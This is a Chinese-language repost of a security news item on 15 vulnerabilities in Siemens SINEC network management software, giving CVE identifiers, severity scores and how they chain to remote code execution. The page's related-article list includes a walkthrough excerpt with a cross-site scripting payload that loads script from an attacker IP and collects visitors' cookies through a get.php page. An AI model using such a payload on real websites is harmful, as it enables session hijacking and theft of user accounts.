西门子工业网络管理系统中存在15个漏洞,可导致RCE

最新推荐文章于 2024-05-21 09:31:27 发布
最新推荐文章于 2024-05-21 09:31:27 发布
阅读量529 收藏
点赞数
文章标签: 网络 安全 信息安全 java 物联网
原文链接:https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247512458&idx=2&sn=f1263ecf9f5f3344014fbb23ed01ef9b&chksm=ea9480e0dde309f6895b3ca1824f5dbf05ec60a8059c2590a09de5d1f9ce9f6091a15eacabfa&scene=126&&sessionid=0
版权

0c8d5f5e8b04ad2b9cb5683044f2ff22.gif 聚焦源代码安全,网罗国内外最新资讯!

编译:代码卫士

18f5d408a2caa2164b8cece739005c33.png

网络安全研究员披露了位于西门子 SINEC 网络管理系统 (NMS) 中的15个漏洞详情,其中一些漏洞可被攻击者组合利用,最终在受影响系统上实现远程代码执行。

工业安全公司 Claroty 发布报告指出,“如果这些漏洞遭利用,可对网络上的西门子设备带来诸多风险,包括拒绝服务攻击、凭据泄露和在某些情况下的远程代码执行。”

这些漏洞的编号是CVE-2021-33722至CVE-2022-22736,西门子已经在版本 V1.0 SP2 Update 1 中修复,该版本于2021年10月12日发布。西门子当时在安全公告中指出,“在一定条件下,最严重的漏洞可导致认证的远程攻击者以系统权限在系统上执行任意代码。”其中最主要的漏洞是CVE-2021-33723(CVSS评分8.8),可导致攻击者权限提升至管理员账户,并和路径遍历缺陷CVE-2021-33722(CVSS评分7.2)组合利用,远程执行任意代码。

另外一个值得注意的缺陷和 SQL 注入有关(CVE-2021-33729,CVSS评分8.8),可被认证攻击者用于在本地数据库中执行任意命令。

研究人员指出,“SINEC位于网络拓扑中一个强大的中心位置,因为它要求访问凭据、加密密钥和其它机密信息,使攻击者具有管理员访问权限以管理网络中的设备。从攻击者角度来看,执行这类远程攻击,滥用、访问并控制合法凭据和网络工具执行恶意活动,使攻击者能够执行侦察、横向移动和提权操作。”      

代码卫士试用地址:https://codesafe.qianxin.com

开源卫士试用地址:https://oss.qianxin.com

推荐阅读

西门子修复因使用第三方组件引起的90多个漏洞

工控2月补丁星期二:西门子、施耐德电气修复近50个漏洞

工控补丁星期二:西门子、施耐德电气修复40个漏洞

NASA、西门子和大众都在用的 IoT 协议可遭滥用

NUCLEUS:13:西门子实时操作系统 Nucleus漏洞影响物联网设备等

原文链接

https://thehackernews.com/2022/06/over-dozen-flaws-found-in-siemens.html

题图:Pixabay License

本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

a6c0685b191d2f3e2867f708163817a8.png

ab5be8e2b0f5bd5818f3261ab6ce639c.png

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

   f2287b1a008e959ee9f8741d0c77e77f.gif 觉得不错,就点个 “在看” 或 "赞” 吧~

奇安信代码卫士
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SIEMENS西门子工业信息安全操作指导(完整版高清材料)
11-05
SIEMENS西门子是全球范围内的知名工业自动化厂商,SIEMENS也提出了工业信息安全的最佳实践,用于指导其客户群体加强工控安全建设,该文档为西门子官方材料,内容涉及工厂安全信息安全、系统完整性、功能安全等内容,是网络安全从业人员不可多得的优质材料。
西门子修复因使用第三方组件引起的90多个漏洞
smellycat000的专栏
03-10 281
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
西门子 PLM 产品被曝数十个漏洞,可导致代码执行后果
smellycat000的专栏
01-18 464
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本周,西门子通知客户称某些产品开发解决方案受二十多个漏洞的影响,可导致攻击者利用恶意文件执行任意代码。这些漏洞由多个研究人员...
良精管理系统漏洞
weixin_30896825的博客
05-12 394
主题:良精多风格多语企业网站管理系统漏洞难度:知识点:脚本、跨站工具包:get.php MyBrower.exe qq.js漏洞处:公司名称跨站漏洞今天让大家看一下漏洞的利用方法 <script src=http://192.168.1.101/qq.js></script> 192.168.1.101/get.php是我们获得COOKIE的程序192.1...
西门子SIMATIC控制器爆2漏洞
xumesang的专栏
04-27 1179
原文章来自微信 西门子近期发布了SIMATIC S7-1500可编程逻辑控制器(PLC)的固件更新版本。其目的是解决两个漏洞。 0x01  cve-2016-2200 V3 世界范围内关键制造,化学工业、食品和饮料行业常用的西门子SIMATIC S7-1500 CPU系列,上个月被ICS-CERT报告存在严重漏洞,编号是cve-2016-2200 V3,评分7.5
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
如何利用三个漏洞组合达成Discord RCE漏洞 .pdf
09-05
如何利用三个漏洞组合达成Discord RCE漏洞 金融安全 安全人才 解决方案 金融安全 企业安全
xalanjava源码-jackspoilt:导致RCE的上下文反序列化漏洞-远程代码执行
06-05
xalan java源码我们在证明什么 Jackson 数据绑定反序列化漏洞 应用环境 基于Spark框架的微服务() 取决于 ...夏兰:夏兰:2.7.2 ...上面的命令在attackscripts目录创建attack.json cd 攻击脚本 ./add.sh ./l
CVE-2021-22192 靶场: 未授权用户 RCE 漏洞.zip
01-16
在靶场安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
记某市某管理系统SQL注入漏洞
AD_CSY的博客
06-03 353
前言 近日在谷歌引擎查找到一个站点。是某市的某报到系统。漏洞已经上报CNVD,这里就当是记录分享了。 过程记录 1.进来是一个管理员登陆入口,进去了之后尝试用一些弱口令进行登录。无果,这里就暂时放弃暴力破解。尝试寻找其他突破口。 2.进入网站的主界面,有一处查询框。一般这样的搜索查询框可能会有SQL注入。 3.尝试能不能进行SQL注入。直接随便输入,然后在后面加上单引号进行验证。果然不出所料报错了,报错信息可以看出是access数据库,真让人头大。 4.由于url上没有明确显示可以注入的参数,怀疑可能
研究人员发现西门子工业控制器的命令执行漏洞
NOSEC2019的博客
11-18 402
近期,有研究人员发现了西门子SIMATIC S7-1200可编程逻辑控制器(PLC)的新漏洞,可让攻击者在存在漏洞的设备上执行任意代码。 该漏洞西门子SIMATIC S7-1200可编程逻辑控制器(PLC)一个未被文本记录的功能有关,是由来自德国Ruhr Bochum大学的Ali Abbasi、Tobias Scharnowski和Thorsten Holz组成的研究小组发现的。 该漏洞被标...
工控补丁星期二:西门子、施耐德电气修复40个漏洞
smellycat000的专栏
01-13 339
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士2022年,西门子和施耐德电气公司发布新一轮安全公告,共计修复了40个漏洞西门子西门子发布五份安全公告,共修复14个漏洞。从CVSS评...
西门子楼宇自动系统出现间人攻击漏洞CVE-2016-9154 本已发布通告可又悄悄撤除...
weixin_34013044的博客
09-01 287
西门子漏洞自控管理系统HVAC系统的Desigo PX工业控制固件模块出现漏洞CVE-2016-9154,随后西门子与ICS-CERT协作发布了可被远程利用的漏洞及补丁,并在官网发布了这个信息,但不知道啥时候该页面已经不可访问。Siemens Desigo PX Web Modules < 6.00.046版本存在无效熵漏洞,远程攻击者利用...
Linux网络编程:网络基础
weixin_73234157的博客
05-20 554
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机,数据从键盘读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。
使用MPLS解决BGP的路由黑洞(详解)
qq_64302290的博客
05-18 232
我们知道在MPLS数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
云服务器遇到攻击怎么办,有哪些安全措施
dexunyun的博客
05-18 547
DDoS攻击对云服务器安全构成了严重威胁,但通过采取合适的防护策略,我们可以有效地降低攻击的影响。选择可靠的云服务提供商、部署DDoS防护服务是保护云服务器免受DDoS攻击的有效措施。德迅云安全提供了多种防护解决方案,可以帮助企业有效防止DDoS攻击,保护云服务器的安全,保障业务稳定。
netstat协议
lovemelovefish的博客
05-15 388
本机各端口的网络连接情况。
MQTT 异常断开(一)
最新发布
m0_50668851的博客
05-21 162
MQTT异分析问题总结 前提:MQTT是基于TCP层再次封装,MQTT是不关心TCP层的实现与传输,但是如果TCP链路出现异常(丢失TCP ACK,网络延时TCP ACK等)一定会导致MQTT断开连接。 MQTT代理服务器存在如下问题: a.代理服务器,对于连接时没有及时处理收到模块关于TCP层的 TCP ACK(Seq确认包),出现重传MQTT Connect Ack。模块内部MQTT的处理逻辑,NQTT收到Connect Ack之后,模块已经准备就绪,回码OK, 但是客户......
文件操作IO&网络编程&网络原理
tulingtuling的博客
05-13 1604
文件操作IO,网络编程,网络原理
pikachu靶场RCE漏洞
10-13
Pikachu靶场是一个用于渗透测试和漏洞研究的虚拟机,而RCE漏洞则是一种远程代码执行漏洞,攻击者可以利用该漏洞在受害者系统上执行任意代码。 针对这个问题,我建议您可以参考以下步骤来修复该漏洞: 1. 确认漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值